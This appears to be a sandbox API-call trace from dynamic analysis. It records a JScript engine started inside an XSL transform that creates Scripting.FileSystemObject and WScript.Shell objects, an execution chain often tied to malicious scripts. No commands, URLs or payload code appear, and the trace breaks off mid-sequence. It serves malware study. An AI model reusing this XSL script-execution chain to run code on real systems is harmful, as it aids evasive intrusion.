[0058.072] JScriptEngine5:IUnknown:QueryInterface (in: This=0x17d4870, riid=0x6d3b1034*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x12f6ac | out: ppvObject=0x12f6ac*=0x17d4870) returned 0x0
[0058.072] JScriptEngine5:IUnknown:Release (This=0x17d4870) returned 0x1
[0058.072] JScriptEngine5:IUnknown:QueryInterface (in: This=0x17d4870, riid=0x6d3b1044*(Data1=0xbb1a2ae2, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x5e8b54 | out: ppvObject=0x5e8b54*=0x17d4874) returned 0x0
[0058.072] JScriptEngine5:IUnknown:QueryInterface (in: This=0x17d4870, riid=0x6d375634*(Data1=0xcb5bdc81, Data2=0x93c1, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x12f6c4 | out: ppvObject=0x12f6c4*=0x17d48a4) returned 0x0
[0058.074] JScriptEngine5:IUnknown:Release (This=0x17d48a4) returned 0x2
[0058.074] JScriptEngine5:IActiveScript:SetScriptSite (This=0x17d4870, pass=0x5e7eb0) returned 0x0
[0058.074] GetCurrentThreadId () returned 0x9a8
[0058.074] GetCurrentThreadId () returned 0x9a8
[0058.074] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f67c | out: phkResult=0x12f67c*=0x44c) returned 0x0
[0058.074] GetProcAddress (hModule=0x76da0000, lpProcName="RegQueryValueExA") returned 0x76db48ef
[0058.075] RegQueryValueExA (in: hKey=0x44c, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x12f670, lpData=0x12f674, lpcbData=0x12f678*=0x4 | out: lpType=0x12f670*=0x4, lpData=0x12f674*=0x1, lpcbData=0x12f678*=0x4) returned 0x0
[0058.075] GetProcAddress (hModule=0x76da0000, lpProcName="RegCloseKey") returned 0x76db469d
[0058.075] RegCloseKey (hKey=0x44c) returned 0x0
[0058.075] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0058.075] GetProcAddress (hModule=0x76a20000, lpProcName="CoGetObjectContext") returned 0x76a6632b
[0058.075] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000
[0058.076] GetProcAddress (hModule=0x76a20000, lpProcName="CoCreateInstance") returned 0x76a69d0b
[0058.076] CoCreateInstance (in: rclsid=0x6d2a23a8*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d2a23b8*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12f678 | out: ppv=0x12f678*=0x76b66460) returned 0x0
[0058.076] ??_U@YAPAXI@Z () returned 0x18f6c8
[0058.077] JScriptEngine5:IUnknown:QueryInterface (in: This=0x5e7eb0, riid=0x6d2a1d54*(Data1=0x539698a0, Data2=0xcdca, Data3=0x11cf, Data4=([0]=0xa5, [1]=0xeb, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x47, [6]=0xa0, [7]=0x63)), ppvObject=0x17d4d44 | out: ppvObject=0x17d4d44*=0x0) returned 0x80004002
[0058.077] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x12f620, nSize=0x27 | out: lpBuffer="") returned 0x0
[0058.077] JScriptEngine5:IUnknown:AddRef (This=0x5e7eb0) returned 0x2
[0058.077] IActiveScriptSite:GetLCID (in: This=0x5e7eb0, plcid=0x12f6b8 | out: plcid=0x12f6b8*=0x409) returned 0x0
[0058.077] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0058.077] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x12f68c, cchData=6 | out: lpLCData="1252") returned 5
[0058.077] IsValidCodePage (CodePage=0x4e4) returned 1
[0058.077] JScriptEngine5:IUnknown:QueryInterface (in: This=0x5e7eb0, riid=0x6d2a188c*(Data1=0x51973c11, Data2=0xcb0c, Data3=0x11d0, Data4=([0]=0xb5, [1]=0xc9, [2]=0x0, [3]=0xa0, [4]=0x24, [5]=0x4a, [6]=0xe, [7]=0x7a)), ppvObject=0x17d4a0c | out: ppvObject=0x17d4a0c*=0x5e7ec4) returned 0x0
[0058.077] JScriptEngine5:IActiveScriptSiteDebug32:GetApplication (in: This=0x5e7ec4, ppda=0x17d4a14 | out: ppda=0x17d4a14*=0x0) returned 0x80004001
[0058.077] CoCreateInstance (in: rclsid=0x6d2a15ec*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d2a15fc*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x17d4a5c | out: ppv=0x17d4a5c*=0x2893c8) returned 0x0
[0058.078] IUnknown:AddRef (This=0x2893c8) returned 0x2
[0058.078] GetCurrentProcessId () returned 0x9a4
[0058.078] GetCurrentThreadId () returned 0x9a8
[0058.078] GetTickCount () returned 0x1ca8e
[0058.078] ISystemDebugEventFire:BeginSession (This=0x2893c8, guidSourceID=0x6d2a16d4, strSessionName="JScript:00002468:00002472:18117390") returned 0x0
[0058.078] JScriptEngine5:IActiveScriptParse32:InitNew (This=0x17d4874) returned 0x0
[0058.078] IActiveScriptSite:OnStateChange (This=0x5e7eb0, ssScriptState=5) returned 0x0
[0058.078] GetCurrentThreadId () returned 0x9a8
[0058.083] GetCurrentThreadId () returned 0x9a8
[0058.086] JScriptEngine5:IActiveScript:SetScriptState (This=0x17d4870, ss=0) returned 0x0
[0058.086] GetUserDefaultLCID () returned 0x409
[0058.086] GetACP () returned 0x4e4
[0058.087] ISystemDebugEventFire:EndSession (This=0x2893c8) returned 0x0
[0058.087] IUnknown:Release (This=0x2893c8) returned 0x1
[0058.087] JScriptEngine5:IUnknown:Release (This=0x5e7ec4) returned 0x2
[0058.087] IUnknown:Release (This=0x2893c8) returned 0x0
[0058.087] IActiveScriptSite:OnStateChange (This=0x5e7eb0, ssScriptState=0) returned 0x0
[0058.087] JScriptEngine5:IUnknown:Release (This=0x5e7eb0) returned 0x1
[0058.087] XSLTemplate:IXSLTemplate:createProcessor (in: This=0x5e8848, ppProcessor=0x12fa18 | out: ppProcessor=0x12fa18*=0x5ea728) returned 0x0
[0058.087] FreeThreadedDOMDocument:IUnknown:AddRef (This=0x5e9bc8) returned 0x2
[0058.087] IXSLProcessor:put_input (This=0x5ea728, input=0x12f948*(varType=0x9, wReserved1=0x0, wReserved2=0x9492, wReserved3=0x22, varVal1=0x5e9bc8, varVal2=0x12f9e4)) returned 0x0
[0058.087] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0058.087] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x12f900 | out: lpConsoleScreenBufferInfo=0x12f900) returned 1
[0058.088] IXSLProcessor:transform (in: This=0x5ea728, pDone=0x12fa00 | out: pDone=0x12fa00*=0xffff) returned 0x0
[0058.090] JScriptEngine5:IUnknown:QueryInterface (in: This=0x17d4870, riid=0x6d375634*(Data1=0xcb5bdc81, Data2=0x93c1, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x12f828 | out: ppvObject=0x12f828*=0x17d48a4) returned 0x0
[0058.090] JScriptEngine5:IUnknown:Release (This=0x17d48a4) returned 0x3
[0058.090] JScriptEngine5:IActiveScript:SetScriptSite (This=0x17d4870, pass=0x5e7eb0) returned 0x0
[0058.090] GetCurrentThreadId () returned 0x9a8
[0058.091] JScriptEngine5:IUnknown:QueryInterface (in: This=0x5e7eb0, riid=0x6d2a1d54*(Data1=0x539698a0, Data2=0xcdca, Data3=0x11cf, Data4=([0]=0xa5, [1]=0xeb, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x47, [6]=0xa0, [7]=0x63)), ppvObject=0x17e81ec | out: ppvObject=0x17e81ec*=0x0) returned 0x80004002
[0058.091] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x12f780, nSize=0x27 | out: lpBuffer="") returned 0x0
[0058.091] JScriptEngine5:IUnknown:AddRef (This=0x5e7eb0) returned 0x2
[0058.091] IActiveScriptSite:GetLCID (in: This=0x5e7eb0, plcid=0x12f81c | out: plcid=0x12f81c*=0x409) returned 0x0
[0058.091] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0058.091] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x12f7f0, cchData=6 | out: lpLCData="1252") returned 5
[0058.091] IsValidCodePage (CodePage=0x4e4) returned 1
[0058.091] IActiveScriptSite:OnStateChange (This=0x5e7eb0, ssScriptState=5) returned 0x0
[0058.091] JScriptEngine5:IUnknown:QueryInterface (in: This=0x5e7eb0, riid=0x6d2a188c*(Data1=0x51973c11, Data2=0xcb0c, Data3=0x11d0, Data4=([0]=0xb5, [1]=0xc9, [2]=0x0, [3]=0xa0, [4]=0x24, [5]=0x4a, [6]=0xe, [7]=0x7a)), ppvObject=0x17d4a0c | out: ppvObject=0x17d4a0c*=0x5e7ec4) returned 0x0
[0058.091] JScriptEngine5:IActiveScriptSiteDebug32:GetApplication (in: This=0x5e7ec4, ppda=0x17d4a14 | out: ppda=0x17d4a14*=0x0) returned 0x80004001
[0058.091] CoCreateInstance (in: rclsid=0x6d2a15ec*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d2a15fc*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x17d4a5c | out: ppv=0x17d4a5c*=0x289458) returned 0x0
[0058.091] IUnknown:AddRef (This=0x289458) returned 0x2
[0058.091] GetCurrentProcessId () returned 0x9a4
[0058.091] GetCurrentThreadId () returned 0x9a8
[0058.091] GetTickCount () returned 0x1ca9e
[0058.091] ISystemDebugEventFire:BeginSession (This=0x289458, guidSourceID=0x6d2a16d4, strSessionName="JScript:00002468:00002472:18117406") returned 0x0
[0058.091] JScriptEngine5:IActiveScript:SetScriptState (This=0x17d4870, ss=2) returned 0x0
[0058.093] JScriptEngine5:IUnknown:AddRef (This=0x5e7eb0) returned 0x4
[0058.093] CoGetObjectContext (in: riid=0x6d2a0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12f700 | out: ppv=0x12f700*=0x206fb0) returned 0x0
[0058.093] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x76b66460, pUnk=0x18f8c0, riid=0x6d2a5710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x18f8dc | out: pdwCookie=0x18f8dc*=0x201) returned 0x0
[0058.093] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x18f8c0, riid=0x76a597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12f684 | out: ppvObject=0x12f684*=0x0) returned 0x80004002
[0058.093] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x18f8c0, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12f674 | out: ppvObject=0x12f674*=0x0) returned 0x80004002
[0058.093] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x18f8c0) returned 0x2
[0058.093] IUnknown:AddRef (This=0x206fb0) returned 0x2
[0058.093] IUnknown:Release (This=0x206fb0) returned 0x1
[0058.093] GetTickCount () returned 0x1ca9e
[0058.094] CoGetObjectContext (in: riid=0x6d2a0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12f750 | out: ppv=0x12f750*=0x206fb0) returned 0x0
[0058.094] IUnknown:Release (This=0x206fb0) returned 0x1
[0058.094] ISystemDebugEventFire:IsActive (This=0x289458) returned 0x1
[0058.094] CoGetObjectContext (in: riid=0x6d2a0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12f74c | out: ppv=0x12f74c*=0x206fb0) returned 0x0
[0058.094] IUnknown:Release (This=0x206fb0) returned 0x1
[0058.095] IActiveScriptSite:OnEnterScript (This=0x5e7eb0) returned 0x0
[0058.097] _ftime (_Tmb=0x12eea0)
[0058.114] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0058.114] GetProcAddress (hModule=0x76a20000, lpProcName="CLSIDFromProgIDEx") returned 0x76a30782
[0058.114] GetProcAddress (hModule=0x76a20000, lpProcName="CLSIDFromProgID") returned 0x76a4503c
[0058.114] CLSIDFromProgID (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x12f314 | out: lpclsid=0x12f314*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
[0058.115] SysStringLen (param_1=0x0) returned 0x0
[0058.115] JScriptEngine5:IUnknown:QueryInterface (in: This=0x5e7eb0, riid=0x6d293cc8*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x12f2b0 | out: ppvObject=0x12f2b0*=0x5e7ec0) returned 0x0
[0058.116] JScriptEngine5:IServiceProvider:QueryService (in: This=0x5e7ec0, guidService=0x6d2bb538*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x6d2bb538*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x17d4a00 | out: ppvObject=0x17d4a00*=0x5e7ef0) returned 0x0
[0058.116] JScriptEngine5:IUnknown:Release (This=0x5e7ec0) returned 0x4
[0058.116] IInternetHostSecurityManager:ProcessUrlAction (in: This=0x5e7ef0, dwAction=0x1200, pPolicy=0x12f2c4, cbPolicy=0x4, pContext=0x12f314*=0x1, cbContext=0x10, dwFlags=0x0, dwReserved=0x0 | out: pPolicy=0x12f2c4*=0x0) returned 0x0
[0058.116] GetProcAddress (hModule=0x76a20000, lpProcName="CoGetClassObject") returned 0x76a554ad
[0058.116] CoGetClassObject (in: rclsid=0x12f314*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x5, pvReserved=0x0, riid=0x6d2a087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12f308 | out: ppv=0x12f308*=0x18e7b0) returned 0x0
[0058.350] FileSystemObject:IUnknown:QueryInterface (in: This=0x18e7b0, riid=0x6d2a7884*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x12f304 | out: ppvObject=0x12f304*=0x0) returned 0x80004002
[0058.350] FileSystemObject:IClassFactory:CreateInstance (in: This=0x18e7b0, pUnkOuter=0x0, riid=0x6d2a0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12f30c | out: ppvObject=0x12f30c*=0x18e7d0) returned 0x0
[0058.350] FileSystemObject:IUnknown:Release (This=0x18e7b0) returned 0x0
[0058.350] IInternetHostSecurityManager:QueryCustomPolicy (in: This=0x5e7ef0, guidKey=0x6d2bb6fc, ppPolicy=0x12f290, pcbPolicy=0x12f288, pContext=0x12f29c*=0x1, cbContext=0x18, dwReserved=0x0 | out: ppPolicy=0x12f290, pcbPolicy=0x12f288*=0x4) returned 0x0
[0058.351] GetProcAddress (hModule=0x76a20000, lpProcName="CoTaskMemFree") returned 0x76a76f41
[0058.351] CoTaskMemFree (pv=0x250de0)
[0058.351] FileSystemObject:IUnknown:QueryInterface (in: This=0x18e7d0, riid=0x6d2a5a50*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x12f2c0 | out: ppvObject=0x12f2c0*=0x0) returned 0x80004002
[0058.351] FileSystemObject:IUnknown:QueryInterface (in: This=0x18e7d0, riid=0x6d2a5700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x12f2ac | out: ppvObject=0x12f2ac*=0x0) returned 0x80004002
[0058.351] FileSystemObject:IUnknown:QueryInterface (in: This=0x18e7d0, riid=0x6d2a55f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x12f2a8 | out: ppvObject=0x12f2a8*=0x0) returned 0x80004002
[0058.351] FileSystemObject:IUnknown:QueryInterface (in: This=0x18e7d0, riid=0x6d2a5608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x12f2a4 | out: ppvObject=0x12f2a4*=0x0) returned 0x80004002
[0058.351] FileSystemObject:IUnknown:QueryInterface (in: This=0x18e7d0, riid=0x6d2a5764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x12f2a0 | out: ppvObject=0x12f2a0*=0x0) returned 0x80004002
[0058.351] FileSystemObject:IUnknown:QueryInterface (in: This=0x18e7d0, riid=0x6d2a5710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12f29c | out: ppvObject=0x12f29c*=0x18e7d0) returned 0x0
[0058.351] FileSystemObject:IUnknown:Release (This=0x18e7d0) returned 0x1
[0058.351] CLSIDFromProgID (in: lpszProgID="WScript.Shell", lpclsid=0x12f314 | out: lpclsid=0x12f314*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
[0058.352] SysStringLen (param_1=0x0) returned 0x0
[0058.352] IInternetHostSecurityManager:ProcessUrlAction (in: This=0x5e7ef0, dwAction=0x1200, pPolicy=0x12f2c4, cbPolicy=0x4, pContext=0x12f314*=0xd5, cbContext=0x10, dwFlags=0x0, dwReserved=0x0 | out: pPolicy=0x12f2c4*=0x0) returned 0x0
[0058.352] CoGetClassObject (in: rclsid=0x12f314*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x5, pvReserved=0x0, riid=0x6d2a087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12f308 | out: ppv=0x12f308*=0x28969c) returned 0x0
[0058.377] WshShell:IUnknown:QueryInterface (in: This=0x28969c, riid=0x6d2a7884*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x12f304 | out: ppvObject=0x12f304*=0x0) returned 0x80004002
[0058.377] WshShell:IClassFactory:CreateInstance (in: This=0x28969c, pUnkOuter=0x0, riid=0x6d2a0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12f30c | out: ppvObject=0x12f30c*=0x298ab4) returned 0x0
[0058.378] WshShell:IUnknown:Release (This=0x28969c) returned 0x0
[0058.378] IInternetHostSecurityManager:QueryCustomPolicy (in: This=0x5e7ef0, guidKey=0x6d2bb6fc, ppPolicy=0x12f290, pcbPolicy=0x12f288, pContext=0x12f29c*=0xd5, cbContext=0x18, dwReserved=0x0 | out: ppPolicy=0x12f290, pcbPolicy=0x12f288*=0x4) returned 0x0
[0058.378] CoTaskMemFree (pv=0x250e00)
[0058.378] WshShell:IUnknown:QueryInterface (in: This=0x298ab4, riid=0x6d2a5a50*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x12f2c0 | out: ppvObject=0x12f2c0*=0x0) returned 0x80004002
[0058.378] WshShell:IUnknown:QueryInterface (in: This=0x298ab4, riid=0x6d2a5700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x12f2ac | out: ppvObject=0x12f2ac*=0x0) returned 0x80004002
[0058.378] WshShell:IUnknown:QueryInterface (in: This=0x298ab4, riid=0x6d2a55f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x12f2a8 | out: ppvObject=0x12f2a8*=0x0) returned 0x80004002
[0058.379] WshShell:IUnknown:QueryInterface (in: This=0x298ab4, riid=0x6d2a5608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x12f2a4 | out: ppvObject=0x12f2a4*=0x0) returned 0x80004002
[0058.379] WshShell:IUnknown:QueryInterface (in: This=0x298ab4, riid=0x6d2a5764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x12f2a0 | out: ppvObject=0x12f2a0*=0x0) returned 0x80004002
[0058.379] WshShell:IUnknown:QueryInterface (in: This=0x298ab4, riid=0x6d2a5710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12f29c | out: ppvObject=0x12f29c*=0x289774) returned 0x0
[0058.381] WshShell:IUnknown:Release (This=0x298ab4) returned 0x1
[0058.381] CLSIDFromProgID (in: lpszProgID="WScript.Shell", lpclsid=0x12f314 | out: lpclsid=0x12f314*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
[0058.381] SysStringLen (param_1=0x0) returned 0x0
[0058.381] IInternetHostSecurityManager:ProcessUrlAction (in: This=0x5e7ef0, dwAction=0x1200, pPolicy=0x12f2c4, cbPolicy=0x4, pContext=0x12f314*=0xd5, cbContext=0x10, dwFlags=0x0, dwReserved=0x0 | out: pPolicy=0x12f2c4*=0x0) returned 0x0
[0058.381] CoGetClassObject (in: rclsid=0x12f314*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x5, pvReserved=0x0, riid=0x6d2a087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12f308 | out: ppv=0x12f308*=0x2896e4) returned 0x0
[0058.381] WshShell:IUnknown:QueryInterface (in: This=0x2896e4, riid=0x6d2a7884*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x12f304 | out: ppvObject=0x12f304*=0x0) returned 0x80004002
[0058.381] WshShell:IClassFactory:CreateInstance (in: This=0x2896e4, pUnkOuter=0x0, riid=0x6d2a0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12f30c | out: ppvObject=0x12f30c*=0x298c94) returned 0x0
[0058.382] WshShell:IUnknown:Release (This=0x2896e4) returned 0x0
[0058.382] IInternetHostSecurityManager:QueryCustomPolicy (in: This=0x5e7ef0, guidKey=0x6d2bb6fc, ppPolicy=0x12f290, pcbPolicy=0x12f288, pContext=0x12f29c*=0xd5, cbContext=0x18, dwReserved=0x0 | out: ppPolicy=0x12f290, pcbPolicy=0x12f288*=0x4) returned 0x0
[0058.382] CoTaskMemFree (pv=0x250df0)
[0058.382] WshShell:IUnknown:QueryInterface (in: This=0x298c94, riid=0x6d2a5a50*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x12f2c0 | out: ppvObject=0x12f2c0*=0x0) returned 0x80004002
[0058.382] WshShell:IUnknown:QueryInterface (in: This=0x298c94, riid=0x6d2a5700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x12f2ac | out: ppvObject=0x12f2ac*=0x0) returned 0x80004002
[0058.383] WshShell:IUnknown:QueryInterface (in: This=0x298c94, riid=0x6d2a55f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x12f2a8 | out: ppvObject=0x12f2a8*=0x0) returned 0x80004002
